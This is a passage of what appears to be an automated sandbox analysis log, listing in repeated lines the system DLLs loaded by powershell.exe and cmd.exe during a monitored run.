                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winmm.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                Source: C:\Windows\System32\cmd.exeSection loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dll
